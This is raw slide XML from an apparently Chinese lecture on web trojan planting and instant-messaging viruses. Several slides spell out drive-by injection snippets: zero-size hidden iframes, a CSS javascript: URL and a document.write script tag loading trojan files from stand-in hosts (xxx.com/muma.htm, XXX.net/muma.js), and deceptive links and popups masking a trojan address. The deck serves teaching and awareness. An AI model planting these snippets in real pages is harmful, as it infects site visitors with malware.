            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>flash</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>木马</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>网页木马地址 插入木马地址 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>width=10 height=10", "GET" </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>宽度和高度</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页挂马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1589405"/>
            <a:ext cx="9677400" cy="2560955"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pP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不点出现链接的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="25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윤고딕120"/>
              </a:rPr>
              <a:t>木马</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&lt;a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href</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="http://www.163.com(</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迷惑的超级连接地址，显示这个地址指向木马地址</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&gt; </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页面要显示的内容 </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&lt;/a&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007745" y="3388360"/>
            <a:ext cx="9228455" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>fu&lt;SCRIPT Language="JavaScript"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="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rPr>
              <a:t>www_163_com () </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>var url="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>你的木马地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>"; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>menubar=no,scrollbars=no,resizable=no, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>copyhistory=yes,width=800,height=600,left=10,top=10"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;/SCRIPT&gt;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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页挂马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pP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隐蔽挂马</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top.document.body.innerHTML</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top.document.body.innerHTML</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+'\r\n&lt;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iframe</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src</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="http://www.xxx.com/muma.htm/"&gt;&lt;/iframe&gt;'[/url]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500" b="0"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윤고딕120"/>
              </a:rPr>
              <a:t>css</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中挂</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="25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윤고딕120"/>
              </a:rPr>
              <a:t>马</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body{</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background-image:url</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javascript:document.write</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("&lt;script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src</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=http://www.XXX.net/muma.js&gt;&lt;/script&gt;")')}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页挂马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1341438"/>
            <a:ext cx="8763000" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>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Java</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挂马</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&lt;SCRIPT language=</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javascript</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&gt;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window.open</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地址</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","","toolbar=</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no,location</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no,directories</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no,status</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no,menubar</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no,scro</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llbars</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no,width</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=1,height=1");  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="25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윤고딕120"/>
              </a:rPr>
              <a:t>图片</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伪装</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&lt;html&gt;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iframe</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src</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网马地址</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height=0 width=0&gt;&lt;/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iframe</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&gt;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img</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src</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图片地址</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"&gt;&lt;/center&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页挂马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pP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伪装调用</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윤고딕120"/>
              </a:rPr>
              <a:t>&lt;</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frameset rows="444,0" cols="*"&gt;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윤고딕120"/>
              </a:rPr>
              <a:t>&lt;</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frame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src</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打开网页</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framborder</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="no" scrolling="auto"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noresize</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marginwidth</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="0"margingheight="0"&gt;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윤고딕120"/>
              </a:rPr>
              <a:t>&lt;</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frame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src</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网马地址</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frameborder</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="no" scrolling="no"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noresize</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marginwidth</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="0"margingheight="0"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页挂马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:normAutofit fontScale="90000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pP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高级欺骗</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&lt;a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href</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="http://www.163.com(</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迷惑连接地址，显示这个地址指向木马地址</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&gt; </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页面要显示的内容</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&lt;/a&gt;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&lt;SCRIPT Language="JavaScript"&gt;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function www_163_com ()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var</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url</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zh-CN" altLang="en-US"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网马地址</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p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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open(</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url</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NewWindow</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","toolbar=</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no,location</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no,directories</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no,status</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no,menubar</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no,scrollbars</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no,resizable</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no,copyhistory</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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2500" b="0" i="0" u="none" strike="noStrike" kern="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윤고딕120"/>
              </a:rPr>
              <a:t>yes,width</a:t>
            </a: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=800,height=600,left=10,top=10"); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>&lt;/SCRIPT&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="1" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="25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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通讯病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50178" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>根据国外专业调查机构的研究报告显示，目前企业中有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>60%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>以上的员工在使用即时通讯软件进行实时交流</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>但是调查报告同时显示，只有不到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>10%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>的公司建立了针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>IM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>软件的管理规范</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>给别有用心的病毒制造者提供了难得的空间</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通讯病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51202" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议进行发送和接收“消息”</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病毒程序利用系统提供的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>OICQ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
